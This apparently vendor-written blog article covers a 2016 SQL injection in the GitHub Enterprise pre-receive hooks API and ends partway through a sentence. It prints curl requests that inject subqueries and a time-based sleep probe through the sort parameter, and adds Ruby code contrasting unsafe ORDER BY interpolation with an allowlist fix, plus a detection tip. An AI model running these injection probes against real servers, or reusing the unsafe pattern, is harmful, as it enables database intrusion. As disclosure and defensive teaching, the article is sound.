Have Yourself a Merry Little Vulnerability

SQL injection attacks against applications are on the rise, with large enterprises and global corporations being the main targets. As we have seen time and again, even software from reliable vendors can have vulnerabilities that open the way for malicious users to compromise the security of an application. Here is another example.

The end of 2016 was marked by the discovery of a new GitHub Enterprise vulnerability. GitHub.com is a web-based hosting service built on Git, an open source distributed version control system. GitHub Enterprise is the on-premises version of GitHub, packaged for running on an organization’s local network. The vulnerability enabled malicious users to inject SQL commands into SQL statements by sending a specially crafted request.

GitHub Enterprise is delivered as a virtual appliance, with 45-day free trial licenses available. It shares a code base with GitHub.com. The source code is kept private and is retrieved in obfuscated form during installation. After de-obfuscating the code, the researcher found that it was mostly written in Ruby, with Python, C++, Bourne Shell and Java components. Once he had access to the code, it took him only four days to analyze potential problems and find a SQL injection vulnerability in the GitHub Enterprise PreReceiveHookTarget model. The malicious payload could be injected through the sort parameter of a query sent to the API.

$ curl -k -H 'Accept:application/vnd.github.eye-scream-preview' \
    'https://192.168.187.145/api/v3/organizations/1/pre-receive-hooks?access_token=????????&sort=id,(select+1+from+information_schema.tables+limit+1,1)'

$ curl -k -H 'Accept:application/vnd.github.eye-scream-preview' \
    'https://192.168.187.145/api/v3/organizations/1/pre-receive-hooks?access_token=????????&sort=id,(select+1+from+mysql.user+limit+1,1)'
{
  "message": "Server Error",
  "documentation_url": "https://developer.github.com/enterprise/2.8/v3/orgs/pre_receive_hooks"
}

$ curl -k -H 'Accept:application/vnd.github.eye-scream-preview' \
    'https://192.168.187.145/api/v3/organizations/1/pre-receive-hooks?access_token=????????&sort=id,if(user()="github@localhost",sleep(5),user())'
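The requests above work because the sort parameter ends up inside the SQL ORDER BY clause, a position that prepared-statement placeholders cannot protect. The following is an added example, not GitHub's code and not taken from the vulnerable model, written in Ruby because the write-up says most of the code base is Ruby. It contrasts the unsafe interpolation pattern with an allowlist-based builder that accepts only known column names and directions; the table and column names, the function names and the InvalidSortError class are assumptions made for the example.

```ruby
require 'set'

# Columns the API may sort by and the directions it accepts. These names are
# assumptions for the example, not the PreReceiveHookTarget schema.
SORTABLE_COLUMNS = Set.new(%w[id name created_at updated_at]).freeze
DIRECTIONS       = Set.new(%w[asc desc]).freeze

class InvalidSortError < ArgumentError; end

# Unsafe pattern: the raw parameter is interpolated into the SQL text, so
# everything after the first comma becomes part of the ORDER BY clause.
def order_by_unsafe(sort_param)
  "SELECT * FROM pre_receive_hooks ORDER BY #{sort_param}"
end

# Safe pattern: parse "col,col:desc" into tokens, accept only allowlisted
# column names and directions, and rebuild the clause from those tokens.
# Parentheses, subqueries and function calls never match the allowlist.
def order_by_safe(sort_param)
  terms = sort_param.to_s.split(',').map do |term|
    column, direction = term.strip.split(':', 2)
    direction = (direction || 'asc').downcase
    unless SORTABLE_COLUMNS.include?(column) && DIRECTIONS.include?(direction)
      raise InvalidSortError, "unsupported sort term: #{term.inspect}"
    end
    "#{column} #{direction.upcase}"
  end
  raise InvalidSortError, 'empty sort' if terms.empty?
  "SELECT * FROM pre_receive_hooks ORDER BY #{terms.join(', ')}"
end

# Returns :rejected for inputs the safe builder refuses, :accepted otherwise.
def classify_sort(sort_param)
  order_by_safe(sort_param)
  :accepted
rescue InvalidSortError
  :rejected
end

if __FILE__ == $PROGRAM_NAME
  # Constructed input with the shape of the sort value in the requests above.
  injected = 'id,(select 1 from information_schema.tables limit 1,1)'
  puts order_by_unsafe(injected)    # the subquery lands inside ORDER BY
  puts order_by_safe('id,name:desc') # SELECT ... ORDER BY id ASC, name DESC
  puts classify_sort(injected)       # rejected
end
```

Rejecting the whole request on an unknown sort term, rather than silently dropping it, also gives a clear log line to alert on: a burst of 4xx responses with parentheses or SQL keywords in the sort parameter is a cheap detection signal for this class of probing.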

GitHub was informed about the vulnerability in December and fixed the problem in the GitHub Enterprise 2.8.5 release. The researcher who spotted the bug received a $5,000 reward. GitHub's bug bounty program was launched three years ago. During this time more than 100 software security researchers wer